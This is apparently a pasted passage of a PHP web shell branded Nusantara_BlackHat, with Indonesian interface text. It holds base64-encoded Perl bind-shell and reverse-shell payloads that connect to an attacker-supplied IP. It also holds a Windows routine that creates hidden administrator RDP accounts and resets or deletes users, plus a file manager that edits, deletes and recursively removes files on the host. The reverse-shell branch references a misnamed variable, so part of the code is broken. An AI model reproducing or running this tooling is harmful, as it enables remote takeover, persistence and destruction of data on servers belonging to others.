  2206.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  2207.     if(isset($_POST['sub_bp'])) {
  2208.         $f_bp = fopen("/tmp/bp.pl", "w");
  2209.         fwrite($f_bp, base64_decode($bind_port_p));
  2210.         fclose($f_bp);
  2211.  
  2212.         $port = $_POST['port_bind'];
  2213.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  2214.         sleep(1);
  2215.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  2216.         unlink("/tmp/bp.pl");
  2217.     }
  2218.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  2219.     if(isset($_POST['sub_bc'])) {
  2220.         $f_bc = fopen("/tmp/bc.pl", "w");
  2221.         fwrite($f_bc, base64_decode($bind_connect_p));
  2222.         fclose($f_bc);
  2223.  
  2224.         $ipbc = $_POST['ip_bc'];
  2225.         $port = $_POST['port_bc'];
  2226.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  2227.         sleep(1);
  2228.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  2229.         unlink("/tmp/bc.pl");
  2230.     }
  2231. } elseif($_GET['do'] == 'krdp_shell') {
  2232.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  2233.         if($_POST['create']) {
  2234.             $user = htmlspecialchars($_POST['user']);
  2235.             $pass = htmlspecialchars($_POST['pass']);
  2236.             if(preg_match("/$user/", exe("net user"))) {
  2237.                 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
  2238.             } else {
  2239.                 $add_user   = exe("net user $user $pass /add");
  2240.                 $add_groups1 = exe("net localgroup Administrators $user /add");
  2241.                 $add_groups2 = exe("net localgroup Administrator $user /add");
  2242.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
  2243.                 echo "[ RDP ACCOUNT INFO ]<br>
  2244.                ------------------------------<br>
  2245.                IP: <font color=lime>".$ip."</font><br>
  2246.                Username: <font color=lime>$user</font><br>
  2247.                Password: <font color=lime>$pass</font><br>
  2248.                ------------------------------<br><br>
  2249.                [ STATUS ]<br>
  2250.                ------------------------------<br>
  2251.                ";
  2252.                 if($add_user) {
  2253.                     echo "[add user] -> <font color='lime'>Berhasil</font><br>";
  2254.                 } else {
  2255.                     echo "[add user] -> <font color='red'>Gagal</font><br>";
  2256.                 }
  2257.                 if($add_groups1) {
  2258.                     echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
  2259.                 } elseif($add_groups2) {
  2260.                     echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
  2261.                 } elseif($add_groups3) {
  2262.                     echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
  2263.                 } else {
  2264.                     echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  2265.                 }
  2266.                 echo "------------------------------<br>";
  2267.             }
  2268.         } elseif($_POST['s_opsi']) {
  2269.             $user = htmlspecialchars($_POST['r_user']);
  2270.             if($_POST['opsi'] == '1') {
  2271.                 $cek = exe("net user $user");
  2272.                 echo "Checking username <font color=lime>$user</font> ....... ";
  2273.                 if(preg_match("/$user/", $cek)) {
  2274.                     echo "[ <font color=lime>Sudah ada</font> ]<br>
  2275.                    ------------------------------<br><br>
  2276.                    <pre>$cek</pre>";
  2277.                 } else {
  2278.                     echo "[ <font color=red>belum ada</font> ]";
  2279.                 }
  2280.             } elseif($_POST['opsi'] == '2') {
  2281.                 $cek = exe("net user $user nusantarablackhat");
  2282.                 if(preg_match("/$user/", exe("net user"))) {
  2283.                     echo "[change password: <font color=lime>nusantarablackhat</font>] -> ";
  2284.                     if($cek) {
  2285.                         echo "<font color=lime>Berhasil</font>";
  2286.                     } else {
  2287.                         echo "<font color=red>Gagal</font>";
  2288.                     }
  2289.                 } else {
  2290.                     echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  2291.                 }
  2292.             } elseif($_POST['opsi'] == '3') {
  2293.                 $cek = exe("net user $user /DELETE");
  2294.                 if(preg_match("/$user/", exe("net user"))) {
  2295.                     echo "[remove user: <font color=lime>$user</font>] -> ";
  2296.                     if($cek) {
  2297.                         echo "<font color=lime>Berhasil</font>";
  2298.                     } else {
  2299.                         echo "<font color=red>Gagal</font>";
  2300.                     }
  2301.                 } else {
  2302.                     echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  2303.                 }
  2304.             } else {
  2305.                 //
  2306.             }
  2307.         } else {
  2308.             echo "-- Create RDP --<br>
  2309.            <form method='post'>
  2310.            <input type='text' name='user' placeholder='username' value='nusantarablackhat' required>
  2311.            <input type='text' name='pass' placeholder='password' value='nusantarablackhat' required>
  2312.            <input type='submit' name='create' value='>>'>
  2313.            </form>
  2314.            -- Option --<br>
  2315.            <form method='post'>
  2316.            <input type='text' name='r_user' placeholder='username' required>
  2317.            <select name='opsi'>
  2318.            <option value='1'>Cek Username</option>
  2319.            <option value='2'>Ubah Password</option>
  2320.            <option value='3'>Hapus Username</option>
  2321.            </select>
  2322.            <input type='submit' name='s_opsi' value='>>'>
  2323.            </form>
  2324.            ";
  2325.         }
  2326.     } else {
  2327.         echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  2328.     }
  2329. } elseif($_GET['act'] == 'newfile') {
  2330.     if($_POST['new_save_file']) {
  2331.         $newfile = htmlspecialchars($_POST['newfile']);
  2332.         $fopen = fopen($newfile, "a+");
  2333.         if($fopen) {
  2334.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  2335.         } else {
  2336.             $act = "<font color=red>permission denied</font>";
  2337.         }
  2338.     }
  2339.     echo $act;
  2340.     echo "<form method='post'>
  2341.    Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  2342.    <input type='submit' name='new_save_file' value='Submit'>
  2343.    </form>";
  2344. } elseif($_GET['act'] == 'newfolder') {
  2345.     if($_POST['new_save_folder']) {
  2346.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  2347.         if(!mkdir($new_folder)) {
  2348.             $act = "<font color=red>permission denied</font>";
  2349.         } else {
  2350.             $act = "<script>window.location='?dir=".$dir."';</script>";
  2351.         }
  2352.     }
  2353.     echo $act;
  2354.     echo "<form method='post'>
  2355.    Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  2356.    <input type='submit' name='new_save_folder' value='Submit'>
  2357.    </form>";
  2358. } elseif($_GET['act'] == 'rename_dir') {
  2359.     if($_POST['dir_rename']) {
  2360.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  2361.         if($dir_rename) {
  2362.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2363.         } else {
  2364.             $act = "<font color=red>permission denied</font>";
  2365.         }
  2366.     echo "".$act."<br>";
  2367.     }
  2368.     echo "<form method='post'>
  2369.    <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  2370.    <input type='submit' name='dir_rename' value='rename'>
  2371.    </form>";
  2372. } elseif($_GET['act'] == 'delete_dir') {
  2373.     if(is_dir($dir)) {
  2374.         if(is_writable($dir)) {
  2375.             @rmdir($dir);
  2376.             @exe("rm -rf $dir");
  2377.             @exe("rmdir /s /q $dir");
  2378.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2379.         } else {
  2380.             $act = "<font color=red>could not remove ".basename($dir)."</font>";
  2381.         }
  2382.     }
  2383.     echo $act;
  2384. } elseif($_GET['act'] == 'view') {
  2385.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2386.     echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  2387. } elseif($_GET['act'] == 'edit') {
  2388.     if($_POST['save']) {
  2389.         $save = file_put_contents($_GET['file'], $_POST['src']);
  2390.         if($save) {
  2391.             $act = "<font color=lime>Saved!</font>";
  2392.         } else {
  2393.             $act = "<font color=red>permission denied</font>";
  2394.         }
  2395.     echo "".$act."<br>";
  2396.     }
  2397.     echo "<center>Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2398.     echo "<form method='post'>
  2399.    <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  2400.    <center><input type='submit' value='Save' name='save' style='width: 500px;'></center>
  2401.    </form>";
  2402. } elseif($_GET['act'] == 'rename') {
  2403.     if($_POST['do_rename']) {
  2404.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  2405.         if($rename) {
  2406.             $act = "<script>window.location='?dir=".$dir."';</script>";
  2407.         } else {
  2408.             $act = "<font color=red>permission denied</font>";
  2409.         }
  2410.     echo "".$act."<br>";
  2411.     }
  2412.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2413.     echo "<form method='post'>
  2414.    <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  2415.    <input type='submit' name='do_rename' value='rename'>
  2416.    </form>";
  2417. } elseif($_GET['act'] == 'delete') {
  2418.     $delete = unlink($_GET['file']);
  2419.     if($delete) {
  2420.         $act = "<script>window.location='?dir=".$dir."';</script>";
  2421.     } else {
  2422.         $act = "<font color=red>permission denied</font>";
  2423.     }
  2424.     echo $act;
  2425. } else {
  2426.     if(is_dir($dir) === true) {
  2427.         if(!is_readable($dir)) {
  2428.             echo "<font color=red>can't open directory. ( not readable )</font>";
  2429.         } else {
  2430.             echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  2431.            <tr>
  2432.            <th class="th_home"><center>Name</center></th>
  2433.            <th class="th_home"><center>Type</center></th>
  2434.            <th class="th_home"><center>Size</center></th>
  2435.            <th class="th_home"><center>Last Modified</center></th>
  2436.            <th class="th_home"><center>Owner/Group</center></th>
  2437.            <th class="th_home"><center>Permission</center></th>
  2438.            <th class="th_home"><center>Action</center></th>
  2439.            </tr>';
  2440.             $scandir = scandir($dir);
  2441.             foreach($scandir as $dirx) {
  2442.                 $dtype = filetype("$dir/$dirx");
  2443.                 $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  2444.                 if(function_exists('posix_getpwuid')) {
  2445.                     $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  2446.                     $downer = $downer['name'];
  2447.                 } else {
  2448.                     //$downer = $uid;
  2449.                     $downer = fileowner("$dir/$dirx");
  2450.                 }
  2451.                 if(function_exists('posix_getgrgid')) {
  2452.                     $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  2453.                     $dgrp = $dgrp['name'];
  2454.                 } else {
  2455.                     $dgrp = filegroup("$dir/$dirx");
  2456.                 }
  2457.                 if(!is_dir("$dir/$dirx")) continue;
  2458.                 if($dirx === '..') {
  2459.                     $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  2460.                 } elseif($dirx === '.') {
  2461.                     $href = "<a href='?dir=$dir'>$dirx</a>";
  2462.                 } else {
  2463.                     $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  2464.                 }
  2465.                 if($dirx === '.' || $dirx === '..') {
  2466.                     $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  2467.                     } else {
  2468.                     $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  2469.                 }
  2470.                 echo "<tr>";
  2471.                 echo "<td class='td_home'><img src='http://icons.iconarchive.com/icons/uriy1966/steel-system/24/Games-icon.png'>$href</td>";
  2472.                 echo "<td class='td_home'><center>$dtype</center></td>";
  2473.                 echo "<td class='td_home'><center>-</center></th></td>";
  2474.                 echo "<td class='td_home'><center>$dtime</center></td>";
  2475.                 echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  2476.                 echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  2477.                 echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  2478.                 echo "</tr>";
  2479.             }
  2480.         }
  2481.     } else {
  2482.         echo "<font color=red>can't open directory.</font>";
  2483.     }
  2484.         foreach($scandir as $file) {
  2485.             $ftype = filetype("$dir/$file");
  2486.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  2487.             $size = filesize("$dir/$file")/1024;
  2488.             $size = round($size,3);
  2489.             if(function_exists('posix_getpwuid')) {
  2490.                 $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  2491.                 $fowner = $fowner['name'];
  2492.             } else {
  2493.                 //$downer = $uid;
  2494.                 $fowner = fileowner("$dir/$file");
  2495.             }
  2496.             if(function_exists('posix_getgrgid')) {
  2497.                 $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  2498.                 $fgrp = $fgrp['name'];
  2499.             } else {
  2500.                 $fgrp = filegroup("$dir/$file");
  2501.             }
  2502.             if($size > 1024) {
  2503.                 $size = round($size/1024,2). 'MB';
  2504.             } else {
  2505.                 $size = $size. 'KB';
  2506.             }
  2507.             if(!is_file("$dir/$file")) continue;
  2508.             echo "<tr>";
  2509.             echo "<td class='td_home'><img src='http://icons.iconarchive.com/icons/double-j-design/origami-colored-pencil/24/green-document-cross-icon.png'><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  2510.             echo "<td class='td_home'><center>$ftype</center></td>";
  2511.             echo "<td class='td_home'><center>$size</center></td>";
  2512.             echo "<td class='td_home'><center>$ftime</center></td>";
  2513.             echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  2514.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  2515.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  2516.             echo "</tr>";
  2517.         }
  2518.       echo "</table>";
  2519.         if(!is_readable($dir)) {
  2520.             //
  2521.         } else {
  2522.             echo "<hr>";
  2523.         }
  2524.     echo "<center>Copyright &copy; ".date("Y")." - <font color=dimgray>Nusantara_BlackHat</font></a></center>";
  2525. }
  2526. ?>
  2527. </html>
Add Comment
Please, Sign In to add comment